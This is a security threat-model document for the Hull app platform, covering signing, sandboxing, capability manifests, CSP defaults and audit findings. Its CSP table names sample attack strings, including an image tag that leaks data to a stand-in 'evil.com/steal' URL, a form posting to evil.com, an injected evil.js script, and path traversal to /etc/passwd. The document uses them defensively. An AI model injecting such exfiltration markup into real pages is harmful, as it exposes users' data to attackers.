This document is brutally explicit about what Hull protects against, what it doesn't, and where trust anchors lie.
| Party | Controls | Must Trust |
|---|---|---|
| Platform publisher (gethull.dev) | Platform library, signing key, build service | Nothing (self-sovereign) |
| App developer | Application code, signing key, manifest | Platform publisher (or vendor their own) |
| End user | Which apps to run, which keys to trust | App developer + platform publisher |
| Third-party auditor | Nothing — read-only verification | Cryptographic math (Ed25519, SHA-256) |
The system is designed so that no party requires blind trust:
- Users can verify the platform (signature + canary + source audit)
- Users can verify the app (signature + file hashes + manifest inspection)
- Users can eliminate gethull.dev entirely (self-host, self-sign)
Three verification points, each catching different attack vectors:
| When | What | Tool | Checks |
|---|---|---|---|
| Before download | Inspect capabilities | verify/index.html (offline) |
Platform sig, app sig, manifest, canary |
| Before install | Verify integrity | hull verify --developer-key (CLI) |
Both sigs + file hashes |
| At startup | Runtime check | --verify-sig flag |
App sig + file hashes, platform key pin |
Platform public key:
- Hardcoded in Hull CLI (
HL_PLATFORM_PUBKEY_HEXinsignature.h) - Hardcoded in browser verifier (
GETHULL_DEV_PLATFORM_KEYinverify/index.html) - Published at
https://gethull.dev/.well-known/platform.pub - Overridable via
--platform-key <file>for self-hosted platforms
Developer public key:
- Published in app repository (
.pubfile) - Manually cross-referenced by user against trusted source
- Passed explicitly:
hull verify --developer-key dev.pub
This is the primary threat model. Hull exists to make it possible to trust apps from unknown developers.
Attack: Ship a binary without the Hull platform (custom runtime, no sandbox)
- Prevention: Platform signature + canary. Browser verifier checks platform sig against pinned gethull.dev key. Canary scanner finds
HULL_PLATFORM_CANARYin the binary and verifies its integrity hash against the signed value. - Remaining risk: Developer could build a custom binary that includes the canary bytes at the right offset. Reproducible builds (Phase 9) close this gap entirely — a rebuild from source proves the binary is just "Hull platform + declared source."
Attack: Declare minimal manifest but access more at runtime
- Prevention: Manifest is signed in
package.sig. At runtime, pledge/unveil enforce the declared capabilities at the kernel level. Accessing undeclared paths triggers SIGKILL (Linux/Cosmo). - Remaining risk: macOS has no kernel sandbox — pledge/unveil are no-ops. C-level validation in capability functions is the only defense. A bug in
hl_cap_fs_validate()on macOS would allow bypass. Linux and Cosmopolitan are kernel-enforced.
Attack: Call app.manifest() again at runtime to escalate capabilities
- Prevention: Three independent barriers make this a non-issue:
- One-shot enforcement:
app.manifest()errors on second call in both Lua and JS runtimes. The first call writes to a registry key; any subsequent call raises a runtime error ("app.manifest() can only be called once"). - Startup-only extraction: The manifest is read from the runtime into a C struct (
HlManifest) once during startup (step 10 of the boot sequence). C-level capabilities (rt->env_cfg,rt->http_cfg,rt->csp_policy) are wired from this struct and never re-read from the runtime state. - Kernel seal:
unveil(NULL, NULL)seals filesystem visibility andpledge()restricts syscall families. Both are one-way operations — the kernel refuses to add permissions after sealing, regardless of what the runtime state says.
- One-shot enforcement:
- Even without the one-shot guard, a second
app.manifest()call would only overwrite the Lua/JS registry key with no effect on the already-wired C capabilities or the sealed kernel sandbox. The guard exists to make the immutability explicit and prevent developer confusion.
Attack: SQL injection through user input
- Prevention: All database access goes through
hl_cap_db_query()/hl_cap_db_exec()which use SQLite parameterized binding (sqlite3_bind_*). SQL is always a literal string from app code. No string concatenation, ever. SQL injection is structurally impossible.
Attack: Path traversal to read /etc/passwd
- Prevention:
hl_cap_fs_validate()rejects:- Absolute paths (starts with
/) ..components- Any path that resolves outside the app's base directory via
realpath()ancestor check - Symlink escapes (realpath resolves symlinks before checking)
- Absolute paths (starts with
- Kernel unveil() also blocks access to undeclared paths.
Attack: Memory exhaustion / DoS via infinite allocation
- Prevention:
- Lua: Custom allocator enforces 64 MB heap limit. Exceeding → NULL allocation → script error, not crash.
- QuickJS:
JS_SetMemoryLimit()enforces 64 MB. Exceeding → allocation failure → JS exception.
Attack: Infinite loop / CPU exhaustion
- Prevention:
- QuickJS: Instruction-count interrupt handler. Configurable
max_instructionslimit. Exceeding → JS exception. - Lua: Memory limit eventually triggers (loops allocate stack frames). Less precise than instruction counting.
- QuickJS: Instruction-count interrupt handler. Configurable
Attack: Exfiltrate data to unauthorized hosts
- Prevention:
hl_cap_http_request()validates the target host against the manifest'shostsallowlist. Only declared hosts are reachable. Kernel pledge includesinet+dnsonly if hosts are declared.
Attack: Read environment variables (API keys, secrets)
- Prevention:
hl_cap_env_get()checks against the manifest'senvallowlist (max 32 entries). Undeclared variables return NULL.
Attack: Cross-site scripting (XSS) via template output
- Prevention: Two layers of defense:
- Template auto-escaping: Hull's template engine (
hull.template) HTML-escapes all{{ }}output by default. The five dangerous characters (& < > " ') are replaced with HTML entities. This prevents reflected and stored XSS from user-controlled data rendered into HTML templates. - Content-Security-Policy (CSP): Hull injects a strict CSP header on every
res:html()/res.html()response by default:default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; form-action 'self'; frame-ancestors 'none'. This blocks inline scripts, external script loads,eval(), object embeds, and iframe embedding — even if an attacker bypasses template escaping, the browser refuses to execute injected scripts.
- Template auto-escaping: Hull's template engine (
- Remaining risk: Raw output (
{{{ }}}) and the| rawfilter bypass escaping. Developers must only use raw output with trusted content. Templates don't escape for JavaScript string contexts (e.g. inline<script>blocks) — use{{ var | json }}to safely embed data in JS contexts. Apps that require client-side JavaScript must customize the CSP (e.g.app.manifest({ csp = "default-src 'self'; script-src 'self'" })).
Attack: Clickjacking — embedding the app in a malicious iframe
- Prevention: The default CSP includes
frame-ancestors 'none', which instructs the browser to refuse rendering the page inside any<iframe>,<frame>, or<object>tag. This prevents UI redress attacks where a malicious site overlays invisible frames over the app to trick users into clicking hidden elements. - Actor: Any third-party website operator. Does not require compromising the app — just embedding it.
Attack: MIME type confusion / content sniffing
- Prevention: The default CSP's
default-src 'none'prevents the browser from loading any sub-resources (scripts, stylesheets, fonts, media) that an attacker might inject via reflected content. Combined withContent-Type: text/html; charset=utf-8set byres:html(), the browser cannot misinterpret response content. - Actor: Network MITM or injection via stored user content.
Attack: Template injection (server-side template injection / SSTI)
- Prevention: Template compilation uses
luaL_loadbuffer/JS_Evalin the C bridge, which is only callable from embedded stdlib code (not user application code). The code generator produces deterministic output from the AST — user data is never interpolated into the generated source code. User data flows through the__d(data) parameter at render time, not at compile time. There is noeval()orload()in the sandboxed runtimes.
Attack: Session hijacking via cookie theft
- Prevention:
hull.cookiedefaults toHttpOnly=true,Secure=true,SameSite=Lax. HttpOnly prevents JavaScript access (XSS-based theft). Secure prevents plaintext transmission. SameSite=Lax blocks cross-origin POST requests from carrying session cookies. - Remaining risk: Same-origin XSS can still read
req.ctx.sessiondata. Hull's template engine (hull.template) auto-escapes all{{ }}output by default (& < > " '→ HTML entities), which prevents most reflected and stored XSS vectors. Raw output via{{{ }}}or the| rawfilter bypasses escaping and should only be used with trusted content.
Attack: CSRF — forged state-changing requests from another origin
- Prevention:
hull.middleware.csrfmiddleware generates HMAC-based tokens tied to the session ID and timestamp. State-changing methods (POST/PUT/DELETE/PATCH) require a valid CSRF token in theX-CSRF-Tokenheader or_csrfform field. Tokens expire (default 1h). Safe methods (GET/HEAD/OPTIONS) are automatically skipped. Constant-time comparison prevents timing attacks. - Remaining risk: If the CSRF secret is leaked, tokens can be forged. The secret must be stored securely (e.g.,
env.get("SECRET_KEY")).
Attack: JWT token forgery
- Prevention:
hull.jwtuses HS256 with HMAC-SHA256 (no "none" algorithm, no algorithm negotiation). Signature verification uses constant-time comparison. Expired tokens are rejected. - Remaining risk: JWT secrets must be strong. JWTs are stateless — they cannot be revoked until they expire. For revocation, use sessions instead.
Attack: Session fixation / brute-force session IDs
- Prevention:
hull.middleware.sessiongenerates 32 random bytes (256-bit entropy) viacrypto.random()for session IDs. IDs are hex-encoded (64 chars). Sessions are server-side (SQLite) with sliding expiry. Expired sessions are automatically pruned.
Hull injects security headers automatically at the C level to provide defense in depth:
Content-Security-Policy (CSP):
Default policy (applied to all res:html() / res.html() responses):
default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; form-action 'self'; frame-ancestors 'none'
| Directive | Value | Blocks |
|---|---|---|
default-src |
'none' |
All resource types not explicitly allowed (scripts, fonts, media, objects, workers, WebSockets) |
style-src |
'unsafe-inline' |
External stylesheets (inline styles allowed for SSR convenience) |
img-src |
'self' |
Images from external origins |
form-action |
'self' |
Form submissions to external origins (data exfiltration via <form action="evil.com">) |
frame-ancestors |
'none' |
Embedding in iframes on any origin (clickjacking) |
What the default CSP mitigates:
| Attack | Actor | How CSP Blocks It |
|---|---|---|
Reflected XSS (injected <script>) |
Any user who can craft a malicious URL | default-src 'none' blocks inline script execution |
Stored XSS (persisted <script>) |
Authenticated user who stores malicious content | default-src 'none' blocks inline script execution |
External script injection (<script src="evil.js">) |
Attacker who bypasses template escaping | default-src 'none' blocks all external script loads |
eval()-based XSS |
Attacker who injects data into JS eval context | default-src 'none' implicitly disables eval() and Function() |
| Clickjacking (iframe embedding) | Any third-party site operator | frame-ancestors 'none' refuses rendering in iframes |
| Form action hijacking | Attacker who injects <form action="evil.com"> |
form-action 'self' restricts form targets to same origin |
Data exfiltration via <img src="evil.com/steal?data=..."> |
Attacker with XSS who tries to leak data via image tags | img-src 'self' blocks images from external origins |
| Keylogging via injected external JS | Attacker who loads a remote keylogger script | default-src 'none' blocks all external resource loads |
CSP configuration:
| Manifest | Behavior |
|---|---|
No app.manifest() |
Default strict CSP (defense in depth) |
app.manifest({}) |
Default strict CSP |
app.manifest({ csp = "custom..." }) |
Custom CSP string |
app.manifest({ csp = false }) |
CSP disabled (opt-out) |
Where CSP is injected: At the C level in lua_res_html() and js_res_html(), not in application code. This means the CSP cannot be forgotten, bypassed, or misconfigured by app developers — it's structural, like parameterized SQL. Only res:json() and res:text() skip CSP (non-HTML content types are not vulnerable to script injection).
Attack: Replace binary on CDN with modified version
- Prevention:
binary_hashinpackage.sigis signed by the developer's Ed25519 key. Changed binary → hash mismatch. Browser verifier catches this immediately when binary is uploaded.
Attack: Replace package.sig with forged one
- Prevention: Signature is Ed25519 over the canonical payload. Forging requires the developer's 32-byte private key. Ed25519 is considered secure against all known attacks.
Attack: Replace both binary and package.sig
- Prevention: User verifies the developer's public key against a trusted source (e.g., GitHub repo, personal website). If the attacker doesn't have the developer's private key, they can't produce a valid signature for any payload.
Attack: Replace platform libraries in a self-hosted Hull
- Prevention: Platform signature in
package.sigis verified against the pinned gethull.dev key. Swapped platform → platform signature mismatch.
Attack: Ship malicious platform libraries
-
Prevention: Platform signing key is published. Users can:
- Audit Hull source (AGPL-3.0)
- Build their own platform:
make platform - Sign with own key:
hull sign-platform mykey - Pin their own key in apps
The architecture is designed so you don't have to trust gethull.dev.
Attack: Backdoor the build service
- Prevention: Reproducible builds. Anyone can rebuild from source with the recorded
cc_version+flagsand comparebinary_hash. The build service is a convenience, not a trust requirement.
Complete trust elimination path:
- Download Hull source from GitHub (AGPL-3.0)
- Audit the code
- Build platform yourself:
make platform - Sign with your own key:
hull sign-platform mykey - Distribute to customers with your key pinned
- Customers verify against YOUR key, not gethull.dev's
Trust chain: Customer → You (platform builder) → App developer. gethull.dev is completely out of the picture.
| Mechanism | Implementation | Violation |
|---|---|---|
| Syscall filter | seccomp-bpf via jart/pledge | SIGKILL (unbypassable, kernel-enforced) |
| Filesystem restriction | Landlock via jart/pledge | EACCES or SIGKILL |
| Mode | __pledge_mode = KILL_PROCESS | STDERR_LOGGING |
Process killed + diagnostic to stderr |
Allowed pledge promises: stdio inet rpath wpath cpath flock dns (dns only if hosts declared)
CVE classes prevented:
- Arbitrary file access outside declared paths
- Privilege escalation via undeclared syscalls
- Shell escape / command injection (no
execpledge) - Network exfiltration to undeclared hosts
- Device access, mount, ptrace, raw sockets
| Mechanism | Implementation | Violation |
|---|---|---|
| Syscall filter | Native pledge() in cosmocc libc | SIGKILL |
| Filesystem restriction | Native unveil() | ENOENT |
| Static binary | No dynamic linking | N/A |
Additional protections:
- Works on Linux, FreeBSD, OpenBSD, Windows (via NT security)
- No dynamic linking → no LD_PRELOAD attacks
- No DLL injection
- No dynamic linker attacks
- W^X enforcement by Cosmopolitan runtime
| Mechanism | Implementation | Violation |
|---|---|---|
| Kernel sandbox | Not available | N/A |
| C-level validation | Capability functions | Returns error |
Active defenses:
hl_cap_fs_validate()rejects path traversalhl_cap_env_get()enforces allowlisthl_cap_db_query()uses parameterized bindinghl_cap_http_request()validates host allowlist
Honest limitation: If a bug exists in the C validation layer, macOS has no kernel backup. A vulnerability in hl_cap_fs_validate() would allow filesystem access. On Linux/Cosmo, the kernel catches it anyway. This is a known, documented limitation.
The manifest is the app's declared behavior contract:
app.manifest({
fs = { read = {"data/"}, write = {"data/uploads/"} },
env = {"PORT", "DATABASE_URL", "API_KEY"},
hosts = {"api.stripe.com", "hooks.slack.com"}
})What this tells an auditor:
- This app reads from
data/, writes todata/uploads/ - It reads 3 environment variables
- It makes HTTP calls to Stripe and Slack only
- It has NO other filesystem, environment, or network access
How the system enforces it:
| Level | Enforcement | Bypass |
|---|---|---|
| Kernel | unveil() seals filesystem to declared paths | SIGKILL on violation (Linux/Cosmo) |
| Kernel | pledge() restricts to declared syscall families | SIGKILL on violation (Linux/Cosmo) |
| C | Every capability function validates against manifest | Returns error on violation |
| Signature | Manifest is signed — tampering invalidates signature | Ed25519 forgery required |
No manifest declared? Even if the app doesn't call app.manifest(), the default-deny posture is identical to app.manifest({}):
- Kernel sandbox is applied — pledge/unveil restrict to only the database file and TLS paths
- CSP is active — the default strict policy is injected on all HTML responses
- C-level capabilities deny all — env returns NULL, HTTP requests fail, filesystem operations fail
- Signature still covers the absence of manifest (
"manifest": null)
All example apps declare app.manifest() explicitly, even when the empty {} is sufficient, as a best practice.
- Self-contained HTML file, zero server dependencies
- Runs entirely in browser — no data sent anywhere
- Inlined tweetnacl-js (public domain) for Ed25519
- Web Crypto API for SHA-256
- CSP:
default-src 'none'— no network except optional key fetch viaconnect-src https: - gethull.dev platform key hardcoded — auto-verifies against known key
- Canary scanner: searches uploaded binary for
HULL_PLATFORM_CANARYmagic bytes
Checks performed:
- Platform signature validity (Ed25519)
- Platform key match against pinned gethull.dev key
- App signature validity (Ed25519)
- Developer key match (if provided)
- Binary hash match (if binary uploaded)
- Platform canary presence + integrity (if binary uploaded)
- Source file hash verification (if files uploaded)
- Manifest capability display with risk levels
hull verify [--platform-key <file|url>] [--developer-key <file|url>] [app_dir]
- Reads
package.sig(orhull.sigfor backwards compat) - Verifies platform layer Ed25519 signature
- Verifies app layer Ed25519 signature
- Recomputes SHA-256 of all declared files
- Reports mismatches, missing files, key mismatches
- Exit code 0 = all checks passed, 1 = failure
./myapp --verify-sig dev.pub
- Checks on every startup before accepting connections
- Platform key pinned at compile time (
HL_PLATFORM_PUBKEY_HEX) - Verifies both signature layers
- Verifies file hashes against embedded entries via VFS (O(log n) lookup)
- Refuses to start if any check fails
Service: api.gethull.dev/ci/v1
- Developer pushes source to GitHub
- CI calls
api.gethull.dev/ci/v1/build - Service rebuilds with exact
cc_version+flagsfrompackage.sig - Compares
binary_hash - If match → issues "Reproducible Build Verified" attestation
- Attestation is an Ed25519 signature over
{binary_hash, timestamp, builder_version}
A passing reproducible build check proves the developer could not have injected custom native code. The binary is provably just "Hull platform + declared source files."
- App developers cannot write C — only Lua/JS source
- Platform binary is hash-pinned —
platform.siglocks exact bytes - Trampoline (
app_main.c) is deterministic — generated from template - Cosmopolitan produces deterministic output — static linking, no timestamps
- Build metadata is signed —
cc_version+flagsattested by developer
Run your own rebuild service. Pin your own platform key. Your customers trust you, not gethull.dev.
The Keel HTTP server library (vendored at vendor/keel/) has been audited for memory safety, input validation, resource management, and network security. Full report: keel_audit.md.
Key findings relevant to security:
| Severity | Issue | Impact |
|---|---|---|
| Critical | kqueue kl_event_mod doesn't handle READ|WRITE bitmask |
HTTP/2 write starvation on macOS |
| Critical | WebSocket ws_send_frame partial writes |
Frame corruption on non-blocking sockets |
| High | HTTP/2 and WebSocket 101 upgrade partial writes | Protocol stream corruption |
| High | TLS private key material not zeroed before free | Key residue in heap memory |
| Informational | Request smuggling mitigation present | Transfer-Encoding: chunked zeroes Content-Length (RFC 7230 §3.3.3) |
| Informational | Header injection guard present | contains_crlf() rejects \r/\n in header names/values |
Build hardening verified:
-Wall -Wextra -Wpedantic -Wshadow -Wformat=2 -Werrorin production-fstack-protector-strong(non-Cosmopolitan builds)- ASan + UBSan debug build (
make debug) - Two libFuzzer targets (HTTP parser + multipart parser)
- 229 unit tests across 13 suites
These are real, not theoretical:
| Limitation | Impact | Mitigation |
|---|---|---|
| macOS has no kernel sandbox | C-level validation bugs allow bypass | Use Linux or Cosmo for production |
| Lua lacks instruction-count metering | Infinite loops are only caught by memory limit | QuickJS has precise gas metering |
| Canary is not foolproof | Attacker could embed magic bytes in custom binary | Reproducible builds (Phase 9) eliminate this |
realpath() is TOCTOU |
Race between check and use | Kernel unveil prevents actual access |
| Default CSP blocks client-side JS | Apps needing fetch/AJAX must customize CSP | app.manifest({ csp = "default-src 'self'; connect-src 'self'" }) |
| 32-entry limit per manifest category | Large apps may hit ceiling | Sufficient for most production apps |
req.ctx uses raw malloc (not tracked) |
ctx JSON bypasses runtime memory limits | Capped at 64KB; bounded by runtime heap indirectly |
| HMAC-SHA256 binding returns hex string | Callers must use constant-time comparison | hull.jwt and hull.middleware.csrf stdlib use constant-time internally |